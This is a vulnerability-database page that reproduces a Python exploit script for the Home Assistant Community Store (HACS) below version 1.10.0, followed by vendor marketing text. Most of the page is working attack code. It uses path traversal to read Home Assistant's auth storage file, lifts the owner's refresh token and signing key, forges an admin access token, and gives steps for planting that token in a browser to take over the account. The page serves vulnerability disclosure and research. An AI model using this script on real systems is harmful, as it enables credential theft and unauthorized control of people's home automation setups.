Vulners
Lucene search
Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal
# Exploit Title: Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover
# Date: 2021-01-28
# Exploit Author: Lyghtnox
# Vendor Homepage: https://www.home-assistant.io/
# Software Link: https://github.com/hacs/integration
# Version: < 1.10.0
# Tested on: Raspbian + Home Assistant 2021.1.0
# Blog post: https://lyghtnox.gitlab.io/posts/hacs-exploit/
# STEP 1: Run the exploit (python3 exploit.py host port)
# STEP 2: Copy the token printed and set in your browser's local storage with
# the key `hassTokens`
import requests
import jwt
import json
import argparse
class HA:
def __init__(self, ip, port):
self.ip = ip
self.port = port
def retrieveFile(self, f):
url = f'http://{self.ip}:{self.port}/hacsfiles/../../{f}'
with requests.Session() as s:
r = requests.Request(method='GET', url=url)
prep = r.prepare()
prep.url = url
try:
r = s.send(prep, verify=False)
except requests.exceptions.ConnectionError:
return
if r.status_code == 400 or r.status_code == 404:
return
return r
def craftToken(self):
f = self.retrieveFile('.storage/auth').json()
# Find owner
for user in f['data']['users']:
if user['is_owner']:
self.owner = user['id']
break
else:
print("No owner found. Using first account")
self.owner = f['data']['users'][0]['id']
for token in f['data']['refresh_tokens']:
if self.owner == token['user_id']:
encoded_jwt = jwt.encode({'iss': token['id']},
token['jwt_key'],
algorithm="HS256")
self.token = {'access_token': encoded_jwt,
'token_type': 'Bearer',
'refresh_token': token['token'],
'expires_in': 1800,
'hassUrl': f"http://{self.ip}:{self.port}",
'clientId': token['client_id']}
return self.token
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Exploit a vulnerability in \
HACS < 1.10.0 to gain admin access to an Home Assistant instance.")
parser.add_argument("host", type=str, help="IP of the HASS instance")
parser.add_argument("port", type=int, help="port of the HASS instance")
args = parser.parse_args()
r = requests.get('http://{ip}:{port}/hacsfiles/iconset.js'.format(
ip=args.host,
port=args.port))
if r.status_code != 404:
print("HACS found! Testing vulnerability...", end='', flush=True)
ha = HA(args.host, args.port)
if ha.retrieveFile('configuration.yaml'):
print(": VULNERABLE")
token = ha.craftToken()
if token:
print(f"Use the following 'hassTokens': {json.dumps(token)}")
else:
print("Unable to craft token")
else:
print(": Not vulnerable")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Jan 2021 00:00Current
7.4High risk
Vulners AI Score7.4